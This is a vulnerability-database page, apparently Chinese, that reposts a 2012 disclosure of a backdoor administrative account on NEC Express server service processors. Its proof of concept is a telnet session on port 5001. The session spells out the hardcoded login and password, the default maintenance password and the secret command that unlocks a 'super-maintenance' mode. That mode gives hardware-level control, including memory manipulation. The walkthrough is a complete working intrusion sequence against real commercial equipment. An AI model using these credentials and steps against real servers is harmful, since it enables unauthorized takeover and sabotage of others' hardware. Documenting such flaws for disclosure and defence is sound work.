NEC Backdoor Administrative Account

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047466 漏洞类型
发布时间 2012-05-13 更新时间 2012-05-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012050101
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
   H!

   NEC Corp. has a product line of high perfomance servers
   - http://www.nec.com.sg/index.php?q=products/enterprise-servers

   In the documentations it is said that there is two user privilege
   levels:

   1. Common user - who can monitor the system status

   2. Admin user - for configuring system hardware

   but there is another very high privilege user, who can manipulate
   memory and produce hardware falure.


   POC

   Connect to the service processor of the NEC Express server with the
   telnet client on port 5001:


   Integrated Service Processor.

   Cabinet-ID:xx, Location:y, State:ssssss

   iSP login: spfw<ENTER>

   iSP password: nec<ENTER>

   Copyright (C) 2005 NEC Corporation, All Rights Reserved.

   Welcome to Integrated Service Processor.

   iSP FW version : 01.00 generated on 01/01/2005 19:20:33

   iSP MAIN MENU

       0) OS(BIOS) serial console of partition#0 (INITIALIZING )

       1) OS(BIOS) serial console of partition#1 (RUNNING      )

       V) Virtual System Operator Panel

       S) iSP commands

       E) Exit

       DISCONNECTALL) disconnect all console connections

   iSPyz> s<ENTER>


   Go to maintanance mode with the command "cm", default password mainte

   Now at the command mode enter (With the periods at the end):


   iSP0m:MNT> nec=topvendor.

   ??? : good-bye.

   Command mode was changed to super-maintenance mode.

   BE CAREFUL to use each command.

   iSP0m:@@@>


   you now have super admin rights at the hardware level of the
   supercomputer!


   Thats it.....